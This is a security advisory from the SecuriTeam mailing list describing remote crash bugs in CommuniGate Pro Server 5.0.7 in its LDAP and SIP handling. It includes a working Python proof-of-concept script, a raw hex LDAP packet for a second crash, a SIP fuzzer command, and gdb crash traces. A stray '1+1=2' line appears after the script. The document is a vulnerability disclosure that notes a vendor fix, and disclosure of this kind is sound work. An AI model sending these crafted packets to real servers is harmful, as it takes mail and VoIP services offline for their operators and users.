[UNIX] CommuniGate Pro Server Multiple DoS (LDAP, SIP)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  CommuniGate Pro Server Multiple DoS (LDAP, SIP)
------------------------------------------------------------------------


SUMMARY

" <http://www.stalker.com/content/solutions.htm> CommuniGate Pro is the 
most scalable and modern Internet Communications application server on the 
market today. "

Improper handling of multiple LDAP and SIP usage allows attackers to 
remotely crash CommuniGate Pro.

DETAILS

Vulnerable Systems:
 * CommuniGate Pro Server version 5.0.7

Immune Systems:
 * CommuniGate Pro Server version 5.0.8

LDAP DoS:
By crafting a special LDAP packet, attackers can crash the server 
remotely.

Proof of Concept:
#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov

import sys
import socket

HELP="""
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0  0xada99bbc in memcpy () from /lib/libc.so.6
#1  0x083924b8 in STCopyCString ()
#2  0x08349d5b in BERPackedData::makeCString ()
#3  0x081ae71a in VLDAPInput::processBINDrequest ()
#4  0x081af747 in VLDAPInput::processInput ()
#5  0x082c9373 in VStream::worker ()
#6  0x082ca1e9 in VStream::starter ()
#7  0x08399e7d in STThreadStarter ()
#8  0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9  0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi            0x8688961        141068641
edi            0x86c6fff        141324287
ecx            0x3fff7eae       1073708718
"""

print HELP

host="localhost"
port=389

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))

s  = "\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
s += "\x84\xff\xff\xff\xff"

sock.sendall(s)
sock.close()
1+1=2

LDAP DoS:
By crafting special LDAP packet, attackers can crash the server remotely.

Example:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1458242640 (LWP 25554)]
0x080fa008 in VDirectoryFile::findParentDN ()
(gdb) backtrace
#0  0x080fa008 in VDirectoryFile::findParentDN ()
#1  0x080fa031 in VDirectoryFile::findParentDN ()
..
#353 0x080fa031 in VDirectoryFile::findParentDN ()
#354 0x080fcc6f in VDirectoryFile::findRecords ()
#355 0x080efc23 in VDirectory::findDirectoryRecords ()
#356 0x081b09b3 in VLDAPInput::processInput ()
#357 0x082cb5a3 in VStream::worker ()
#358 0x082cc419 in VStream::starter ()
#359 0x0839c369 in STThreadStarter ()
#360 0xa9a09b80 in start_thread () from /lib/libpthread.so.0
#361 0xa9976dee in clone () from /lib/libc.so.6

To reproduce the vulnerability, send the following data to LDAP port:
"""
 30 82 02 38 02 01 01 63 82 02 31 04 82 02 15 64
 63 3d 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c 2c
 2c 2c 2c 64 63 3d 65 78 61 6d 70 6c 65 2c 64 63
 3d 63 6f 6d 0a 01 02 0a 01 00 02 01 00 02 01 00
 01 01 00 a2 05 87 03 66 6f 6f 30 00

SIP DoS:
By crafting special SIP packet, attackers can crash the server remotely.

Example:
StarGate:~# java -jar c07-sip-r2.jar -touri kfinisterre@192.168.0.35 
-single 2361

Log file snippet:
Dec  9 16:18:14 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 
started
Dec  9 16:20:35 localhost CommuniGatePro: Exception signal: 11, trying to 
recover
Dec  9 16:20:35 localhost CommuniGatePro: Exception in <STThread 87394E8 
UDPReceiver 5060>
Dec  9 16:21:07 localhost CommuniGatePro: CommuniGate Pro Server 5.0.3 
started
Dec  9 16:21:33 localhost CommuniGatePro: Exception signal: 11, trying to 
recover
Dec  9 16:21:33 localhost CommuniGatePro: Exception in <STThread 8738B60 
UDPReceiver 5060>

0x4010e3ac in memmove () from /lib/libc.so.6
(gdb) i r
eax            0xffffffe0       -32
ecx            0x1      1
edx            0xffffffe1       -31
ebx            0x8699758        141137752
esp            0xbabff670       0xbabff670
ebp            0xbabff678       0xbabff678
esi            0x868eeae        141094574
edi            0xffffffe0       -32
eip            0x4010e3ac       0x4010e3ac

(gdb) x/i $pc
0x4010e3ac <memmove+92>:        repz movsb %ds:(%esi),%es:(%edi)

(gdb) bt
#0  0x4010e3ac in memmove () from /lib/libc.so.6
#1  0x0836cdac in SBMutableData::setBytes ()
#2  0x08280964 in VSIPPacket::parseFields ()
#3  0x0827f8da in VSIPPacket::parseData ()
#4  0x0827c8e8 in VSIP::processReadPacket ()
#5  0x0827ce83 in VSIP::processUDPRequest ()
#6  0x081bfeb1 in VUDPListener::receiver ()
#7  0x081bfa71 in VUDPListener::receiverStarter ()
#8  0x0838ad1d in STThreadStarter ()
#9  0x4002af4c in pthread_start_thread () from /lib/libpthread.so.0
#10 0x4002afda in pthread_start_thread_event () from /lib/libpthread.so.0
#11 0x4015f92a in clone () from /lib/libc.so.6

Vendor Status:
The vendor has issued a new version with fixes: CommuniGate Pro Server 
version 5.0.8


ADDITIONAL INFORMATION

The information has been provided by  <mailto:research@gleg.net> Evgeny 
Legerov  and  <mailto:kf_lists@digitalmunition.com> KF .
The original article can be found at:  
<http://www.gleg.net/cg_advisory.txt> http://www.gleg.net/cg_advisory.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.